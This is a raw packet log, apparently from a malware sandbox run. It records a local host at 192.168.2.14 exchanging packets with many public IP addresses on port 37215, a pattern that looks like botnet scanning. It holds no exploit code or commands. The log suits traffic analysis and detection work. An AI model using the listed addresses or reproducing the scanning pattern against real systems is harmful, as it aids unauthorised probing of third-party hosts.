                                                        Jun 13, 2024 21:31:57.121222973 CEST372155292641.226.92.240192.168.2.14
                                                        Jun 13, 2024 21:31:57.121234894 CEST5292637215192.168.2.1441.226.92.240
                                                        Jun 13, 2024 21:31:57.121234894 CEST4049837215192.168.2.14156.250.246.86
                                                        Jun 13, 2024 21:31:57.121252060 CEST5741637215192.168.2.1441.24.86.92
                                                        Jun 13, 2024 21:31:57.121268034 CEST4049837215192.168.2.14156.250.246.86
                                                        Jun 13, 2024 21:31:57.121272087 CEST5741637215192.168.2.1441.24.86.92
                                                        Jun 13, 2024 21:31:57.121285915 CEST5501437215192.168.2.14156.203.51.107
                                                        Jun 13, 2024 21:31:57.121285915 CEST3317837215192.168.2.14156.195.180.29
                                                        Jun 13, 2024 21:31:57.121378899 CEST372155292641.226.92.240192.168.2.14
                                                        Jun 13, 2024 21:31:57.121388912 CEST372154840441.252.252.230192.168.2.14
                                                        Jun 13, 2024 21:31:57.121397972 CEST372155716041.24.86.92192.168.2.14
                                                        Jun 13, 2024 21:31:57.121406078 CEST372155716041.24.86.92192.168.2.14
                                                        Jun 13, 2024 21:31:57.121414900 CEST372155498841.218.92.40192.168.2.14
                                                        Jun 13, 2024 21:31:57.121423006 CEST3721551710156.125.129.63192.168.2.14
                                                        Jun 13, 2024 21:31:57.121429920 CEST4840437215192.168.2.1441.252.252.230
                                                        Jun 13, 2024 21:31:57.121429920 CEST5716037215192.168.2.1441.24.86.92
                                                        Jun 13, 2024 21:31:57.121448994 CEST5498837215192.168.2.1441.218.92.40
                                                        Jun 13, 2024 21:31:57.121457100 CEST5171037215192.168.2.14156.125.129.63
                                                        Jun 13, 2024 21:31:57.121471882 CEST372155716041.24.86.92192.168.2.14
                                                        Jun 13, 2024 21:31:57.121476889 CEST5594637215192.168.2.1441.156.160.87
                                                        Jun 13, 2024 21:31:57.121490002 CEST372155318241.226.92.240192.168.2.14
                                                        Jun 13, 2024 21:31:57.121490002 CEST4840437215192.168.2.1441.252.252.230
                                                        Jun 13, 2024 21:31:57.121500015 CEST3721551710156.125.129.63192.168.2.14
                                                        Jun 13, 2024 21:31:57.121506929 CEST3721551710156.125.129.63192.168.2.14
                                                        Jun 13, 2024 21:31:57.121515036 CEST372155498841.218.92.40192.168.2.14
                                                        Jun 13, 2024 21:31:57.121530056 CEST5318237215192.168.2.1441.226.92.240
                                                        Jun 13, 2024 21:31:57.121536016 CEST372155498841.218.92.40192.168.2.14
                                                        Jun 13, 2024 21:31:57.121545076 CEST3721551966156.125.129.63192.168.2.14
                                                        Jun 13, 2024 21:31:57.121551991 CEST5318237215192.168.2.1441.226.92.240
                                                        Jun 13, 2024 21:31:57.121553898 CEST372155524441.218.92.40192.168.2.14
                                                        Jun 13, 2024 21:31:57.121576071 CEST4439237215192.168.2.14197.246.165.36
                                                        Jun 13, 2024 21:31:57.121584892 CEST5196637215192.168.2.14156.125.129.63
                                                        Jun 13, 2024 21:31:57.121584892 CEST5524437215192.168.2.1441.218.92.40
                                                        Jun 13, 2024 21:31:57.121598959 CEST5196637215192.168.2.14156.125.129.63
                                                        Jun 13, 2024 21:31:57.121599913 CEST5524437215192.168.2.1441.218.92.40
                                                        Jun 13, 2024 21:31:57.121615887 CEST5291837215192.168.2.14156.86.41.94
                                                        Jun 13, 2024 21:31:57.121624947 CEST5709837215192.168.2.14156.102.232.222
                                                        Jun 13, 2024 21:31:57.121761084 CEST372156045641.154.117.158192.168.2.14
                                                        Jun 13, 2024 21:31:57.121769905 CEST372156071241.154.117.158192.168.2.14
                                                        Jun 13, 2024 21:31:57.121778011 CEST372155039841.116.113.130192.168.2.14
                                                        Jun 13, 2024 21:31:57.121787071 CEST372155065441.116.113.130192.168.2.14
                                                        Jun 13, 2024 21:31:57.121799946 CEST372155039841.116.113.130192.168.2.14
                                                        Jun 13, 2024 21:31:57.121807098 CEST5039837215192.168.2.1441.116.113.130
                                                        Jun 13, 2024 21:31:57.121809006 CEST6071237215192.168.2.1441.154.117.158
                                                        Jun 13, 2024 21:31:57.121814013 CEST372155039841.116.113.130192.168.2.14
                                                        Jun 13, 2024 21:31:57.121814966 CEST5065437215192.168.2.1441.116.113.130
                                                        Jun 13, 2024 21:31:57.121823072 CEST3721545050197.175.129.195192.168.2.14
                                                        Jun 13, 2024 21:31:57.121831894 CEST3721545306197.175.129.195192.168.2.14
                                                        Jun 13, 2024 21:31:57.121834040 CEST6071237215192.168.2.1441.154.117.158
                                                        Jun 13, 2024 21:31:57.121840000 CEST3721556822197.116.225.223192.168.2.14
                                                        Jun 13, 2024 21:31:57.121846914 CEST3959837215192.168.2.14156.70.232.219
                                                        Jun 13, 2024 21:31:57.121848106 CEST372155213641.200.53.47192.168.2.14
                                                        Jun 13, 2024 21:31:57.121865988 CEST3721557078197.116.225.223192.168.2.14
                                                        Jun 13, 2024 21:31:57.121875048 CEST372155239241.200.53.47192.168.2.14
                                                        Jun 13, 2024 21:31:57.121881962 CEST372154175641.215.251.115192.168.2.14
                                                        Jun 13, 2024 21:31:57.121889114 CEST372156045641.154.117.158192.168.2.14
                                                        Jun 13, 2024 21:31:57.121895075 CEST4530637215192.168.2.14197.175.129.195
                                                        Jun 13, 2024 21:31:57.121896982 CEST3721537254156.28.204.125192.168.2.14
                                                        Jun 13, 2024 21:31:57.121903896 CEST5239237215192.168.2.1441.200.53.47
                                                        Jun 13, 2024 21:31:57.121910095 CEST372154201241.215.251.115192.168.2.14
                                                        Jun 13, 2024 21:31:57.121915102 CEST5707837215192.168.2.14197.116.225.223
                                                        Jun 13, 2024 21:31:57.121917963 CEST3721537510156.28.204.125192.168.2.14
                                                        Jun 13, 2024 21:31:57.121927023 CEST3721548714156.161.214.109192.168.2.14
                                                        Jun 13, 2024 21:31:57.121936083 CEST3721548458156.161.214.109192.168.2.14
                                                        Jun 13, 2024 21:31:57.121943951 CEST372153483441.74.218.69192.168.2.14
                                                        Jun 13, 2024 21:31:57.121951103 CEST4201237215192.168.2.1441.215.251.115
                                                        Jun 13, 2024 21:31:57.121957064 CEST3751037215192.168.2.14156.28.204.125
                                                        Jun 13, 2024 21:31:57.121958971 CEST372153509041.74.218.69192.168.2.14
                                                        Jun 13, 2024 21:31:57.121958971 CEST4871437215192.168.2.14156.161.214.109
                                                        Jun 13, 2024 21:31:57.121968031 CEST3721552172197.214.25.244192.168.2.14
                                                        Jun 13, 2024 21:31:57.121975899 CEST3721551916197.214.25.244192.168.2.14
                                                        Jun 13, 2024 21:31:57.122001886 CEST5217237215192.168.2.14197.214.25.244
                                                        Jun 13, 2024 21:31:57.122008085 CEST3509037215192.168.2.1441.74.218.69
                                                        Jun 13, 2024 21:31:57.122081995 CEST372155834041.30.140.229192.168.2.14
                                                        Jun 13, 2024 21:31:57.122092009 CEST372155859641.30.140.229192.168.2.14
                                                        Jun 13, 2024 21:31:57.122097969 CEST372154722041.11.9.160192.168.2.14
                                                        Jun 13, 2024 21:31:57.122121096 CEST5859637215192.168.2.1441.30.140.229
                                                        Jun 13, 2024 21:31:57.122184992 CEST5065437215192.168.2.1441.116.113.130
                                                        Jun 13, 2024 21:31:57.122203112 CEST5239237215192.168.2.1441.200.53.47
                                                        Jun 13, 2024 21:31:57.122212887 CEST5707837215192.168.2.14197.116.225.223
                                                        Jun 13, 2024 21:31:57.122212887 CEST4201237215192.168.2.1441.215.251.115
                                                        Jun 13, 2024 21:31:57.122225046 CEST4871437215192.168.2.14156.161.214.109
                                                        Jun 13, 2024 21:31:57.122226000 CEST3751037215192.168.2.14156.28.204.125
                                                        Jun 13, 2024 21:31:57.122231007 CEST4530637215192.168.2.14197.175.129.195
                                                        Jun 13, 2024 21:31:57.122231007 CEST3509037215192.168.2.1441.74.218.69
                                                        Jun 13, 2024 21:31:57.122236013 CEST5217237215192.168.2.14197.214.25.244
                                                        Jun 13, 2024 21:31:57.122236013 CEST5859637215192.168.2.1441.30.140.229
                                                        Jun 13, 2024 21:31:57.122323036 CEST3721533304156.33.213.35192.168.2.14
                                                        Jun 13, 2024 21:31:57.122332096 CEST372155213641.200.53.47192.168.2.14
                                                        Jun 13, 2024 21:31:57.122339010 CEST372153310041.164.167.64192.168.2.14
                                                        Jun 13, 2024 21:31:57.122684956 CEST3721545050197.175.129.195192.168.2.14
                                                        Jun 13, 2024 21:31:57.122703075 CEST3721556822197.116.225.223192.168.2.14
                                                        Jun 13, 2024 21:31:57.122843027 CEST3721533560156.33.213.35192.168.2.14
                                                        Jun 13, 2024 21:31:57.122852087 CEST372153335641.164.167.64192.168.2.14
                                                        Jun 13, 2024 21:31:57.122867107 CEST372154747641.11.9.160192.168.2.14
                                                        Jun 13, 2024 21:31:57.122876883 CEST372155762641.145.12.182192.168.2.14
                                                        Jun 13, 2024 21:31:57.122885942 CEST3356037215192.168.2.14156.33.213.35
                                                        Jun 13, 2024 21:31:57.122885942 CEST372155788241.145.12.182192.168.2.14
                                                        Jun 13, 2024 21:31:57.122886896 CEST3335637215192.168.2.1441.164.167.64
                                                        Jun 13, 2024 21:31:57.122895002 CEST3721557056197.213.201.186192.168.2.14
                                                        Jun 13, 2024 21:31:57.122905016 CEST3356037215192.168.2.14156.33.213.35
                                                        Jun 13, 2024 21:31:57.122909069 CEST3721537254156.28.204.125192.168.2.14
                                                        Jun 13, 2024 21:31:57.122909069 CEST4747637215192.168.2.1441.11.9.160
                                                        Jun 13, 2024 21:31:57.122919083 CEST3721557312197.213.201.186192.168.2.14
                                                        Jun 13, 2024 21:31:57.122925997 CEST5788237215192.168.2.1441.145.12.182
                                                        Jun 13, 2024 21:31:57.122925997 CEST3335637215192.168.2.1441.164.167.64
                                                        Jun 13, 2024 21:31:57.122927904 CEST372153858241.167.21.178192.168.2.14
                                                        Jun 13, 2024 21:31:57.122936964 CEST372155738241.165.241.236192.168.2.14
                                                        Jun 13, 2024 21:31:57.122950077 CEST5731237215192.168.2.14197.213.201.186
                                                        Jun 13, 2024 21:31:57.122980118 CEST5788237215192.168.2.1441.145.12.182
                                                        Jun 13, 2024 21:31:57.122988939 CEST5731237215192.168.2.14197.213.201.186
                                                        Jun 13, 2024 21:31:57.123001099 CEST4747637215192.168.2.1441.11.9.160
                                                        Jun 13, 2024 21:31:57.123214006 CEST372153883841.167.21.178192.168.2.14
                                                        Jun 13, 2024 21:31:57.123224020 CEST372155763841.165.241.236192.168.2.14
                                                        Jun 13, 2024 21:31:57.123230934 CEST372153488041.57.153.43192.168.2.14
                                                        Jun 13, 2024 21:31:57.123240948 CEST372153462441.57.153.43192.168.2.14
                                                        Jun 13, 2024 21:31:57.123249054 CEST372154175641.215.251.115192.168.2.14
                                                        Jun 13, 2024 21:31:57.123260975 CEST5763837215192.168.2.1441.165.241.236
                                                        Jun 13, 2024 21:31:57.123264074 CEST3488037215192.168.2.1441.57.153.43
                                                        Jun 13, 2024 21:31:57.123292923 CEST5763837215192.168.2.1441.165.241.236
                                                        Jun 13, 2024 21:31:57.123292923 CEST3883837215192.168.2.1441.167.21.178
                                                        Jun 13, 2024 21:31:57.123292923 CEST3883837215192.168.2.1441.167.21.178
                                                        Jun 13, 2024 21:31:57.123295069 CEST3488037215192.168.2.1441.57.153.43
                                                        Jun 13, 2024 21:31:57.123315096 CEST3721535484156.194.188.235192.168.2.14
                                                        Jun 13, 2024 21:31:57.123589993 CEST3721535740156.194.188.235192.168.2.14
                                                        Jun 13, 2024 21:31:57.123608112 CEST372155351041.40.22.39192.168.2.14
                                                        Jun 13, 2024 21:31:57.123619080 CEST372155376641.40.22.39192.168.2.14
                                                        Jun 13, 2024 21:31:57.123634100 CEST3574037215192.168.2.14156.194.188.235
                                                        Jun 13, 2024 21:31:57.123646021 CEST3574037215192.168.2.14156.194.188.235
                                                        Jun 13, 2024 21:31:57.123648882 CEST5376637215192.168.2.1441.40.22.39
                                                        Jun 13, 2024 21:31:57.123675108 CEST5376637215192.168.2.1441.40.22.39
                                                        Jun 13, 2024 21:31:57.124269962 CEST3721558452197.14.227.73192.168.2.14
                                                        Jun 13, 2024 21:31:57.124341011 CEST3721558708197.14.227.73192.168.2.14
                                                        Jun 13, 2024 21:31:57.124351025 CEST3721548458156.161.214.109192.168.2.14
                                                        Jun 13, 2024 21:31:57.124357939 CEST372151260341.158.26.48192.168.2.14
                                                        Jun 13, 2024 21:31:57.124366999 CEST3721512603156.143.209.83192.168.2.14
                                                        Jun 13, 2024 21:31:57.124375105 CEST372151260341.107.231.137192.168.2.14
                                                        Jun 13, 2024 21:31:57.124382973 CEST3721512603197.154.74.163192.168.2.14
                                                        Jun 13, 2024 21:31:57.124385118 CEST5870837215192.168.2.14197.14.227.73
                                                        Jun 13, 2024 21:31:57.124392033 CEST3721512603197.112.192.179192.168.2.14
                                                        Jun 13, 2024 21:31:57.124399900 CEST1260337215192.168.2.1441.158.26.48
                                                        Jun 13, 2024 21:31:57.124399900 CEST372151260341.154.194.136192.168.2.14
                                                        Jun 13, 2024 21:31:57.124406099 CEST1260337215192.168.2.14156.143.209.83
                                                        Jun 13, 2024 21:31:57.124406099 CEST1260337215192.168.2.1441.107.231.137
                                                        Jun 13, 2024 21:31:57.124407053 CEST5870837215192.168.2.14197.14.227.73
                                                        Jun 13, 2024 21:31:57.124409914 CEST372151260341.107.23.150192.168.2.14
                                                        Jun 13, 2024 21:31:57.124425888 CEST1260337215192.168.2.14197.154.74.163
                                                        Jun 13, 2024 21:31:57.124427080 CEST372151260341.189.90.134192.168.2.14
                                                        Jun 13, 2024 21:31:57.124438047 CEST3721512603156.44.92.123192.168.2.14
                                                        Jun 13, 2024 21:31:57.124439955 CEST1260337215192.168.2.14197.112.192.179
                                                        Jun 13, 2024 21:31:57.124440908 CEST1260337215192.168.2.1441.154.194.136
                                                        Jun 13, 2024 21:31:57.124440908 CEST4866837215192.168.2.1441.158.26.48
                                                        Jun 13, 2024 21:31:57.124444008 CEST1260337215192.168.2.1441.107.23.150
                                                        Jun 13, 2024 21:31:57.124448061 CEST372151260341.218.55.199192.168.2.14
                                                        Jun 13, 2024 21:31:57.124456882 CEST3721512603197.117.53.251192.168.2.14
                                                        Jun 13, 2024 21:31:57.124461889 CEST1260337215192.168.2.1441.189.90.134
                                                        Jun 13, 2024 21:31:57.124465942 CEST372151260341.148.32.215192.168.2.14
                                                        Jun 13, 2024 21:31:57.124466896 CEST1260337215192.168.2.14156.44.92.123
                                                        Jun 13, 2024 21:31:57.124471903 CEST3620237215192.168.2.14156.143.209.83
                                                        Jun 13, 2024 21:31:57.124475002 CEST3721512603197.205.237.132192.168.2.14
                                                        Jun 13, 2024 21:31:57.124490023 CEST3721512603156.155.54.24192.168.2.14
                                                        Jun 13, 2024 21:31:57.124490023 CEST6013237215192.168.2.1441.107.231.137
                                                        Jun 13, 2024 21:31:57.124490976 CEST1260337215192.168.2.1441.218.55.199
                                                        Jun 13, 2024 21:31:57.124490976 CEST1260337215192.168.2.14197.117.53.251
                                                        Jun 13, 2024 21:31:57.124495983 CEST1260337215192.168.2.1441.148.32.215
                                                        Jun 13, 2024 21:31:57.124497890 CEST372151260341.198.13.88192.168.2.14
                                                        Jun 13, 2024 21:31:57.124505043 CEST4677637215192.168.2.14197.154.74.163
                                                        Jun 13, 2024 21:31:57.124505043 CEST1260337215192.168.2.14197.205.237.132
                                                        Jun 13, 2024 21:31:57.124506950 CEST3721512603197.14.31.12192.168.2.14
                                                        Jun 13, 2024 21:31:57.124516964 CEST3721512603197.9.190.76192.168.2.14
                                                        Jun 13, 2024 21:31:57.124517918 CEST4795037215192.168.2.14197.112.192.179
                                                        Jun 13, 2024 21:31:57.124519110 CEST1260337215192.168.2.14156.155.54.24
                                                        Jun 13, 2024 21:31:57.124526978 CEST3721512603156.45.214.160192.168.2.14
                                                        Jun 13, 2024 21:31:57.124528885 CEST1260337215192.168.2.1441.198.13.88
                                                        Jun 13, 2024 21:31:57.124536037 CEST3721512603156.120.94.111192.168.2.14
                                                        Jun 13, 2024 21:31:57.124537945 CEST6005037215192.168.2.1441.154.194.136
                                                        Jun 13, 2024 21:31:57.124545097 CEST3721512603156.233.114.165192.168.2.14
                                                        Jun 13, 2024 21:31:57.124553919 CEST3721512603197.52.51.182192.168.2.14
                                                        Jun 13, 2024 21:31:57.124556065 CEST4211637215192.168.2.1441.107.23.150
                                                        Jun 13, 2024 21:31:57.124557018 CEST1260337215192.168.2.14197.9.190.76
                                                        Jun 13, 2024 21:31:57.124557018 CEST1260337215192.168.2.14197.14.31.12
                                                        Jun 13, 2024 21:31:57.124557018 CEST1260337215192.168.2.14156.45.214.160
                                                        Jun 13, 2024 21:31:57.124566078 CEST3721512603197.223.39.115192.168.2.14
                                                        Jun 13, 2024 21:31:57.124577045 CEST372151260341.109.210.7192.168.2.14
                                                        Jun 13, 2024 21:31:57.124581099 CEST1260337215192.168.2.14156.233.114.165
                                                        Jun 13, 2024 21:31:57.124581099 CEST1260337215192.168.2.14156.120.94.111
                                                        Jun 13, 2024 21:31:57.124581099 CEST1260337215192.168.2.14197.52.51.182
                                                        Jun 13, 2024 21:31:57.124586105 CEST3721512603156.24.24.187192.168.2.14
                                                        Jun 13, 2024 21:31:57.124586105 CEST5755237215192.168.2.1441.189.90.134
                                                        Jun 13, 2024 21:31:57.124593973 CEST3345437215192.168.2.14156.44.92.123
                                                        Jun 13, 2024 21:31:57.124598026 CEST372151260341.25.251.208192.168.2.14
                                                        Jun 13, 2024 21:31:57.124602079 CEST1260337215192.168.2.14197.223.39.115
                                                        Jun 13, 2024 21:31:57.124605894 CEST4246437215192.168.2.1441.218.55.199
                                                        Jun 13, 2024 21:31:57.124605894 CEST1260337215192.168.2.1441.109.210.7
                                                        Jun 13, 2024 21:31:57.124619961 CEST3748637215192.168.2.14197.117.53.251
                                                        Jun 13, 2024 21:31:57.124624968 CEST1260337215192.168.2.14156.24.24.187
                                                        Jun 13, 2024 21:31:57.124624968 CEST1260337215192.168.2.1441.25.251.208
                                                        Jun 13, 2024 21:31:57.124627113 CEST5051437215192.168.2.1441.148.32.215
                                                        Jun 13, 2024 21:31:57.124640942 CEST5055037215192.168.2.14197.205.237.132
                                                        Jun 13, 2024 21:31:57.124648094 CEST4345237215192.168.2.14156.155.54.24
                                                        Jun 13, 2024 21:31:57.124667883 CEST5867237215192.168.2.1441.198.13.88
                                                        Jun 13, 2024 21:31:57.124675989 CEST4412837215192.168.2.14197.9.190.76
                                                        Jun 13, 2024 21:31:57.124691010 CEST4309037215192.168.2.14156.45.214.160
                                                        Jun 13, 2024 21:31:57.124696016 CEST5306637215192.168.2.14156.120.94.111
                                                        Jun 13, 2024 21:31:57.124707937 CEST4986637215192.168.2.14197.52.51.182
                                                        Jun 13, 2024 21:31:57.124720097 CEST5206037215192.168.2.14156.233.114.165
                                                        Jun 13, 2024 21:31:57.125103951 CEST4506837215192.168.2.14197.14.31.12
                                                        Jun 13, 2024 21:31:57.125304937 CEST372151260341.135.121.34192.168.2.14
                                                        Jun 13, 2024 21:31:57.125344038 CEST1260337215192.168.2.1441.135.121.34
                                                        Jun 13, 2024 21:31:57.125379086 CEST3721512603156.164.100.102192.168.2.14
                                                        Jun 13, 2024 21:31:57.125389099 CEST372151260341.54.119.167192.168.2.14
                                                        Jun 13, 2024 21:31:57.125418901 CEST1260337215192.168.2.14156.164.100.102
                                                        Jun 13, 2024 21:31:57.125418901 CEST1260337215192.168.2.1441.54.119.167
                                                        Jun 13, 2024 21:31:57.125451088 CEST3721512603156.174.159.23192.168.2.14
                                                        Jun 13, 2024 21:31:57.125461102 CEST3721512603156.198.149.81192.168.2.14
                                                        Jun 13, 2024 21:31:57.125468016 CEST3721512603156.63.221.69192.168.2.14
                                                        Jun 13, 2024 21:31:57.125475883 CEST372155834041.30.140.229192.168.2.14
                                                        Jun 13, 2024 21:31:57.125483990 CEST3721512603156.217.241.239192.168.2.14
                                                        Jun 13, 2024 21:31:57.125488043 CEST1260337215192.168.2.14156.198.149.81
                                                        Jun 13, 2024 21:31:57.125493050 CEST3721512603156.226.191.31192.168.2.14
                                                        Jun 13, 2024 21:31:57.125494003 CEST1260337215192.168.2.14156.174.159.23
                                                        Jun 13, 2024 21:31:57.125499964 CEST1260337215192.168.2.14156.63.221.69
                                                        Jun 13, 2024 21:31:57.125502110 CEST372151260341.95.172.98192.168.2.14
                                                        Jun 13, 2024 21:31:57.125510931 CEST372151260341.242.91.248192.168.2.14
                                                        Jun 13, 2024 21:31:57.125519037 CEST1260337215192.168.2.14156.217.241.239
                                                        Jun 13, 2024 21:31:57.125519991 CEST3721512603197.224.208.197192.168.2.14
                                                        Jun 13, 2024 21:31:57.125525951 CEST1260337215192.168.2.14156.226.191.31
                                                        Jun 13, 2024 21:31:57.125529051 CEST372151260341.29.18.68192.168.2.14
                                                        Jun 13, 2024 21:31:57.125531912 CEST1260337215192.168.2.1441.95.172.98
                                                        Jun 13, 2024 21:31:57.125538111 CEST3721512603156.162.122.8192.168.2.14
                                                        Jun 13, 2024 21:31:57.125545025 CEST1260337215192.168.2.1441.242.91.248
                                                        Jun 13, 2024 21:31:57.125545979 CEST372151260341.74.86.116192.168.2.14
                                                        Jun 13, 2024 21:31:57.125545025 CEST1260337215192.168.2.14197.224.208.197
                                                        Jun 13, 2024 21:31:57.125554085 CEST1260337215192.168.2.1441.29.18.68
                                                        Jun 13, 2024 21:31:57.125556946 CEST372151260341.85.204.191192.168.2.14
                                                        Jun 13, 2024 21:31:57.125565052 CEST3721512603156.46.119.91192.168.2.14
                                                        Jun 13, 2024 21:31:57.125567913 CEST1260337215192.168.2.14156.162.122.8
                                                        Jun 13, 2024 21:31:57.125574112 CEST3721512603197.218.210.142192.168.2.14
                                                        Jun 13, 2024 21:31:57.125581980 CEST3721512603197.108.129.140192.168.2.14
                                                        Jun 13, 2024 21:31:57.125590086 CEST1260337215192.168.2.1441.85.204.191
                                                        Jun 13, 2024 21:31:57.125591040 CEST3721512603197.107.24.131192.168.2.14
                                                        Jun 13, 2024 21:31:57.125590086 CEST1260337215192.168.2.14156.46.119.91
                                                        Jun 13, 2024 21:31:57.125591993 CEST1260337215192.168.2.1441.74.86.116
                                                        Jun 13, 2024 21:31:57.125597954 CEST3721512603197.191.222.90192.168.2.14
                                                        Jun 13, 2024 21:31:57.125606060 CEST1260337215192.168.2.14197.218.210.142
                                                        Jun 13, 2024 21:31:57.125606060 CEST1260337215192.168.2.14197.108.129.140
                                                        Jun 13, 2024 21:31:57.125607967 CEST3721512603156.92.103.124192.168.2.14
                                                        Jun 13, 2024 21:31:57.125612974 CEST1260337215192.168.2.14197.107.24.131
                                                        Jun 13, 2024 21:31:57.125617027 CEST3721512603156.62.98.162192.168.2.14
                                                        Jun 13, 2024 21:31:57.125627041 CEST3721512603156.253.221.236192.168.2.14
                                                        Jun 13, 2024 21:31:57.125636101 CEST3721512603156.139.179.239192.168.2.14
                                                        Jun 13, 2024 21:31:57.125637054 CEST1260337215192.168.2.14197.191.222.90
                                                        Jun 13, 2024 21:31:57.125642061 CEST1260337215192.168.2.14156.92.103.124
                                                        Jun 13, 2024 21:31:57.125644922 CEST372151260341.118.181.246192.168.2.14
                                                        Jun 13, 2024 21:31:57.125653982 CEST3721512603197.62.252.3192.168.2.14
                                                        Jun 13, 2024 21:31:57.125659943 CEST1260337215192.168.2.14156.62.98.162
                                                        Jun 13, 2024 21:31:57.125663042 CEST3721512603156.214.254.72192.168.2.14
                                                        Jun 13, 2024 21:31:57.125669003 CEST1260337215192.168.2.14156.253.221.236
                                                        Jun 13, 2024 21:31:57.125670910 CEST3721512603197.113.81.97192.168.2.14
                                                        Jun 13, 2024 21:31:57.125678062 CEST1260337215192.168.2.1441.118.181.246
                                                        Jun 13, 2024 21:31:57.125678062 CEST1260337215192.168.2.14156.139.179.239
                                                        Jun 13, 2024 21:31:57.125684023 CEST1260337215192.168.2.14197.62.252.3
                                                        Jun 13, 2024 21:31:57.125684977 CEST1260337215192.168.2.14156.214.254.72
                                                        Jun 13, 2024 21:31:57.125705004 CEST1260337215192.168.2.14197.113.81.97
                                                        Jun 13, 2024 21:31:57.126667976 CEST372153483441.74.218.69192.168.2.14
                                                        Jun 13, 2024 21:31:57.126684904 CEST3721512603156.9.144.200192.168.2.14
                                                        Jun 13, 2024 21:31:57.126693964 CEST372151260341.78.131.109192.168.2.14
                                                        Jun 13, 2024 21:31:57.126702070 CEST372151260341.58.197.199192.168.2.14
                                                        Jun 13, 2024 21:31:57.126720905 CEST1260337215192.168.2.14156.9.144.200
                                                        Jun 13, 2024 21:31:57.126722097 CEST1260337215192.168.2.1441.78.131.109
                                                        Jun 13, 2024 21:31:57.126735926 CEST1260337215192.168.2.1441.58.197.199
                                                        Jun 13, 2024 21:31:57.126838923 CEST3721512603197.137.239.31192.168.2.14
                                                        Jun 13, 2024 21:31:57.126879930 CEST1260337215192.168.2.14197.137.239.31
                                                        Jun 13, 2024 21:31:57.126945019 CEST372151260341.58.11.159192.168.2.14
                                                        Jun 13, 2024 21:31:57.126955986 CEST3721512603197.12.205.2192.168.2.14
                                                        Jun 13, 2024 21:31:57.126971006 CEST3721512603156.102.25.34192.168.2.14
                                                        Jun 13, 2024 21:31:57.126981020 CEST3721512603156.75.118.161192.168.2.14
                                                        Jun 13, 2024 21:31:57.126985073 CEST1260337215192.168.2.1441.58.11.159
                                                        Jun 13, 2024 21:31:57.126985073 CEST1260337215192.168.2.14197.12.205.2
                                                        Jun 13, 2024 21:31:57.126988888 CEST372151260341.59.93.178192.168.2.14
                                                        Jun 13, 2024 21:31:57.126997948 CEST3721512603197.246.138.99192.168.2.14
                                                        Jun 13, 2024 21:31:57.127007008 CEST3721512603197.163.157.17192.168.2.14
                                                        Jun 13, 2024 21:31:57.127008915 CEST1260337215192.168.2.14156.102.25.34
                                                        Jun 13, 2024 21:31:57.127008915 CEST1260337215192.168.2.14156.75.118.161
                                                        Jun 13, 2024 21:31:57.127015114 CEST1260337215192.168.2.1441.59.93.178
                                                        Jun 13, 2024 21:31:57.127036095 CEST1260337215192.168.2.14197.246.138.99
                                                        Jun 13, 2024 21:31:57.127046108 CEST1260337215192.168.2.14197.163.157.17
                                                        Jun 13, 2024 21:31:57.127098083 CEST372154722041.11.9.160192.168.2.14
                                                        Jun 13, 2024 21:31:57.127115011 CEST372151260341.184.22.24192.168.2.14
                                                        Jun 13, 2024 21:31:57.127125025 CEST3721512603197.215.46.148192.168.2.14
                                                        Jun 13, 2024 21:31:57.127132893 CEST3721512603197.118.59.208192.168.2.14
                                                        Jun 13, 2024 21:31:57.127140999 CEST3721512603156.132.86.225192.168.2.14
                                                        Jun 13, 2024 21:31:57.127149105 CEST3721512603197.129.91.65192.168.2.14
                                                        Jun 13, 2024 21:31:57.127156019 CEST1260337215192.168.2.1441.184.22.24
                                                        Jun 13, 2024 21:31:57.127159119 CEST3721512603197.225.111.188192.168.2.14
                                                        Jun 13, 2024 21:31:57.127166033 CEST1260337215192.168.2.14197.118.59.208
                                                        Jun 13, 2024 21:31:57.127166033 CEST1260337215192.168.2.14197.215.46.148
                                                        Jun 13, 2024 21:31:57.127167940 CEST372151260341.157.220.248192.168.2.14
                                                        Jun 13, 2024 21:31:57.127177000 CEST372151260341.231.19.240192.168.2.14
                                                        Jun 13, 2024 21:31:57.127181053 CEST1260337215192.168.2.14197.225.111.188
                                                        Jun 13, 2024 21:31:57.127187014 CEST3721512603197.82.84.128192.168.2.14
                                                        Jun 13, 2024 21:31:57.127194881 CEST1260337215192.168.2.14156.132.86.225
                                                        Jun 13, 2024 21:31:57.127196074 CEST372151260341.138.86.102192.168.2.14
                                                        Jun 13, 2024 21:31:57.127194881 CEST1260337215192.168.2.14197.129.91.65
                                                        Jun 13, 2024 21:31:57.127204895 CEST372151260341.102.59.166192.168.2.14
                                                        Jun 13, 2024 21:31:57.127207041 CEST1260337215192.168.2.1441.157.220.248
                                                        Jun 13, 2024 21:31:57.127207994 CEST1260337215192.168.2.1441.231.19.240
                                                        Jun 13, 2024 21:31:57.127213001 CEST372151260341.242.211.78192.168.2.14
                                                        Jun 13, 2024 21:31:57.127223015 CEST3721533304156.33.213.35192.168.2.14
                                                        Jun 13, 2024 21:31:57.127224922 CEST1260337215192.168.2.14197.82.84.128
                                                        Jun 13, 2024 21:31:57.127230883 CEST372151260341.56.118.237192.168.2.14
                                                        Jun 13, 2024 21:31:57.127238989 CEST3721512603156.54.217.201192.168.2.14
                                                        Jun 13, 2024 21:31:57.127238035 CEST1260337215192.168.2.1441.138.86.102
                                                        Jun 13, 2024 21:31:57.127238035 CEST1260337215192.168.2.1441.102.59.166
                                                        Jun 13, 2024 21:31:57.127243996 CEST3721512603156.163.205.146192.168.2.14
                                                        Jun 13, 2024 21:31:57.127244949 CEST1260337215192.168.2.1441.242.211.78
                                                        Jun 13, 2024 21:31:57.127253056 CEST3721512603197.211.188.140192.168.2.14
                                                        Jun 13, 2024 21:31:57.127260923 CEST372151260341.65.174.17192.168.2.14
                                                        Jun 13, 2024 21:31:57.127269030 CEST372153310041.164.167.64192.168.2.14
                                                        Jun 13, 2024 21:31:57.127271891 CEST1260337215192.168.2.14156.163.205.146
                                                        Jun 13, 2024 21:31:57.127276897 CEST372155762641.145.12.182192.168.2.14
                                                        Jun 13, 2024 21:31:57.127276897 CEST1260337215192.168.2.1441.56.118.237
                                                        Jun 13, 2024 21:31:57.127276897 CEST1260337215192.168.2.14156.54.217.201
                                                        Jun 13, 2024 21:31:57.127285957 CEST1260337215192.168.2.14197.211.188.140
                                                        Jun 13, 2024 21:31:57.127288103 CEST1260337215192.168.2.1441.65.174.17
                                                        Jun 13, 2024 21:31:57.127629995 CEST372151260341.98.61.143192.168.2.14
                                                        Jun 13, 2024 21:31:57.127684116 CEST1260337215192.168.2.1441.98.61.143
